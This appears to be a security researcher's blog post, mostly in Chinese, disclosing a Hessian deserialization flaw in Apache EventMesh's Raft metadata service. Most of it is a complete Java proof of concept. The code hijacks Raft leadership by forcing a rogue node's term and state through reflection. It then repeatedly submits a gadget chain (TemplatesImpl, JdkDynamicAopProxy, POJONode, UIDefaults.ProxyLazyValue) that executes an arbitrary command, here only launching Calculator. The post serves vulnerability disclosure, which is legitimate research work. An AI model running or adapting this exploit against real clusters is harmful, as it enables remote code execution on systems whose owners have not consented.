yulate's blog

Apache eventmesh raft leader Preemption and Hessian Deserialization Vulnerability

2025-03-03 · 8 min read

Creator: yulate 、X1r0z、Au5t1n 、h3h3qaq

0x01 项目搭建

从github克隆项目到本地:https://github.com/apache/eventmesh
修改启动配置文件:eventmesh-runtime/conf/eventmesh.properties,开启raft集群功能,配置如下:

0x02 漏洞分析

org.apache.eventmesh.meta.raft.MetaStateMachine#onApply中存在反序列化漏洞,反序列化器采用的hessian2,反序列化数据可控

Hessian 版本为3.3.6,很容易就能绕过黑名单

本次利用和其他的有所不同,org.apache.eventmesh.meta.raft.JraftServer#JraftServer中使用rpc进行通讯,所以我们发送恶意数据的客户端也需要采用rpc进行处理

得出结论后只需要使用raft特性进行leader抢占,发送message log通讯即可触发onApply方法

0x03 漏洞利用

完整漏洞复现环境如下:
...

完整poc如下:

import com.alipay.remoting.serialization.SerializerManager;
import com.alipay.sofa.jraft.*;
import com.alipay.sofa.jraft.conf.Configuration;
import com.alipay.sofa.jraft.conf.ConfigurationEntry;
import com.alipay.sofa.jraft.core.NodeImpl;
import com.alipay.sofa.jraft.core.State;
import com.alipay.sofa.jraft.entity.PeerId;
import com.alipay.sofa.jraft.entity.Task;
import com.alipay.sofa.jraft.option.CliOptions;
import com.alipay.sofa.jraft.option.NodeOptions;
import com.alipay.sofa.jraft.rpc.CliClientService;
import com.alipay.sofa.jraft.rpc.RaftRpcServerFactory;
import com.alipay.sofa.jraft.rpc.RpcServer;
import com.alipay.sofa.jraft.rpc.impl.GrpcRaftRpcFactory;
import com.alipay.sofa.jraft.rpc.impl.GrpcServerHelper;
import com.alipay.sofa.jraft.rpc.impl.MarshallerHelper;
import com.alipay.sofa.jraft.rpc.impl.cli.CliClientServiceImpl;
import com.caucho.hessian.io.Hessian2Output;
import com.caucho.hessian.io.SerializerFactory;
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import javassist.CtMethod;
import org.apache.commons.lang.SerializationUtils;
import org.apache.eventmesh.meta.raft.EventOperation;
import org.apache.eventmesh.meta.raft.JraftMetaServiceImpl;
import org.apache.eventmesh.meta.raft.JraftServer;
import org.apache.eventmesh.meta.raft.MetaStateMachine;
import org.apache.eventmesh.meta.raft.rpc.MetaServerHelper;
import org.apache.eventmesh.meta.raft.rpc.RequestProcessor;
import org.apache.eventmesh.meta.raft.rpc.RequestResponse;
import org.springframework.aop.framework.AdvisedSupport;

import javax.management.BadAttributeValueExpException;
import javax.swing.*;
import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.*;
import java.nio.ByteBuffer;
import java.util.HashMap;
import java.util.Map;
import java.util.UUID;
import java.util.concurrent.TimeUnit;


/**
 * Hello world!
 */
public class App {

    public static void main(String[] args) throws Exception {
        RouteTable rt = RouteTable.getInstance();
        Configuration conf = new Configuration();

        // 恶意 Raft Server
        PeerId evilPeerId = new PeerId();
        evilPeerId.parse("127.0.0.1:5555");

        // 目标 Raft Server
        PeerId peerId = new PeerId();
        peerId.parse("127.0.0.1:9091");

        String groupId = "EM_META";
        conf.addPeer(evilPeerId);
        conf.addPeer(peerId);

        // 初始化 CliService 和 CliClientService
        CliOptions cliOptions = new CliOptions();
        CliService cliService = RaftServiceFactory.createAndInitCliService(cliOptions);
        CliClientService cliClientService = new CliClientServiceImpl();
        cliClientService.init(cliOptions);

        NodeOptions nodeOptions = new NodeOptions();
        nodeOptions.setElectionTimeoutMs(100000);
        nodeOptions.setDisableCli(false);
        MetaStateMachine fsm = new MetaStateMachine();
        nodeOptions.setFsm(fsm);

        nodeOptions.setLogUri("log-storage");
        nodeOptions.setRaftMetaUri("raftmeta-storage");
        nodeOptions.setSnapshotIntervalSecs(30);
        nodeOptions.setInitialConf(conf);

        // 初始化 JraftServer
        JraftServer jraftServer = new JraftServer("tmp/eventmesh-meta-raft-hack", groupId, evilPeerId, nodeOptions);

        // 刷新路由表
        rt.updateConfiguration(groupId, conf);

        // 等待初始化完成
        TimeUnit.SECONDS.sleep(5);

        // 获取当前term并设置一个较高的值
        Field termField = NodeImpl.class.getDeclaredField("currTerm");
        termField.setAccessible(true);
        termField.set(jraftServer.getNode(), 200031);

        // 获取并修改conf字段
        Field confField = NodeImpl.class.getDeclaredField("conf");
        confField.setAccessible(true);
        ConfigurationEntry oldConfigEntry = (ConfigurationEntry) confField.get(jraftServer.getNode());

        Method setConfMethod = ConfigurationEntry.class.getDeclaredMethod("setConf", Configuration.class);
        setConfMethod.setAccessible(true);
        setConfMethod.invoke(oldConfigEntry, conf);

        // 设置状态为CANDIDATE
        Field stateField = NodeImpl.class.getDeclaredField("state");
        stateField.setAccessible(true);
        stateField.set(jraftServer.getNode(), State.STATE_CANDIDATE);

        // 直接成为leader
        Method becomeLeaderMethod = NodeImpl.class.getDeclaredMethod("becomeLeader");
        becomeLeaderMethod.setAccessible(true);
        becomeLeaderMethod.invoke(jraftServer.getNode());

        // 等待leader稳定
        TimeUnit.SECONDS.sleep(5);

        // 获取集群当前 leader 节点确认
        if (rt.refreshLeader(cliClientService, groupId, 10000).isOk()) {
            PeerId leader = rt.selectLeader(groupId);
            System.out.println("New leader: " + leader);
        }

        // 成为leader后同步snapshot
        Method snapshotMethod = NodeImpl.class.getDeclaredMethod("snapshot", Closure.class);
        snapshotMethod.setAccessible(true);
        snapshotMethod.invoke(jraftServer.getNode(), (Closure) null);

        TimeUnit.SECONDS.sleep(5);
        System.out.println("Snapshot sync completed");

        while (true) {
            System.out.println("==================== send poc ....=======================");
//            byte[] messageBytes = "hacked".getBytes();
            byte[] messageBytes = build();

            // 构造并应用Task
            Task task = new Task();
            task.setData(ByteBuffer.wrap(messageBytes));
            jraftServer.getNode().apply(task);
            System.out.println("Task applied");
            TimeUnit.SECONDS.sleep(20);
        }


    }

    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
        final Field field = getField(obj.getClass(), fieldName);
        field.set(obj, value);
    }

    public static Field getField(final Class<?> clazz, final String fieldName) {
        Field field = null;
        try {
            field = clazz.getDeclaredField(fieldName);
            field.setAccessible(true);
        } catch (NoSuchFieldException ex) {
            if (clazz.getSuperclass() != null)
                field = getField(clazz.getSuperclass(), fieldName);
        }
        return field;
    }

    public static byte[] build() throws Exception {
        ClassPool pool = ClassPool.getDefault();

        CtClass ctClass = pool.makeClass("a" + UUID.randomUUID().toString().replace("-", ""));
        CtClass superClass = pool.get(AbstractTranslet.class.getName());
        ctClass.setSuperclass(superClass);
        CtConstructor constructor = new CtConstructor(new CtClass[]{}, ctClass);
        constructor.setBody("Runtime.getRuntime().exec(\"open -a Calculator\");");
        ctClass.addConstructor(constructor);
        byte[] bytes = ctClass.toBytecode();

        Templates templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templatesImpl, "_name", "test");
        setFieldValue(templatesImpl, "_tfactory", null);

        //利用 JdkDynamicAopProxy 进行封装使其稳定触发
        Class<?> clazz = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy");
        Constructor<?> cons = clazz.getDeclaredConstructor(AdvisedSupport.class);
        cons.setAccessible(true);
        AdvisedSupport advisedSupport = new AdvisedSupport();
        advisedSupport.setTarget(templatesImpl);
        InvocationHandler handler = (InvocationHandler) cons.newInstance(advisedSupport);
        Object proxyObj = Proxy.newProxyInstance(clazz.getClassLoader(), new Class[]{Templates.class}, handler);
        POJONode jsonNodes = new POJONode(proxyObj);

        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(exp, jsonNodes);

        byte[] data = serialize(exp);

        // 使用 ProxyLazyValue 调用非 rt.jar 内的方法, 绕过 ClassLoader 限制
        UIDefaults.ProxyLazyValue proxyLazyValue = new UIDefaults.ProxyLazyValue(SerializationUtils.class.getName(), "deserialize", new Object[]{data});

        Field accField = UIDefaults.ProxyLazyValue.class.getDeclaredField("acc");
        accField.setAccessible(true);
        accField.set(proxyLazyValue, null);

        UIDefaults u1 = new UIDefaults();
        UIDefaults u2 = new UIDefaults();
        u1.put("aaa", proxyLazyValue);
        u2.put("aaa", proxyLazyValue);

        HashMap<Object, Object> hashMap = makeMap(u1, u2);

        SerializerFactory serializerFactory = new SerializerFactory();
        serializerFactory.setAllowNonSerializable(true);
        try (ByteArrayOutputStream bos = new ByteArrayOutputStream()) {
            Hessian2Output output = new Hessian2Output(bos);
            output.setSerializerFactory(serializerFactory);
            output.writeObject(hashMap);
            output.flush();
            return bos.toByteArray();
        }
    }

    public static HashMap<Object, Object> makeMap(Object v1, Object v2) throws Exception {
        HashMap<Object, Object> map = new HashMap<>();
        Method putValMethod = HashMap.class.getDeclaredMethod("putVal", int.class, Object.class, Object.class, boolean.class, boolean.class);
        putValMethod.setAccessible(true);
        putValMethod.invoke(map, 0, v1, 123, false, true);
        putValMethod.invoke(map, 1, v2, 123, false, true);
        return map;
    }

    public static byte[] serialize(Object obj) throws Exception {
        ByteArrayOutputStream arr = new ByteArrayOutputStream();
        try (ObjectOutputStream output = new ObjectOutputStream(arr)) {
            output.writeObject(obj);
        }
        return arr.toByteArray();
    }


}

漏洞利用图: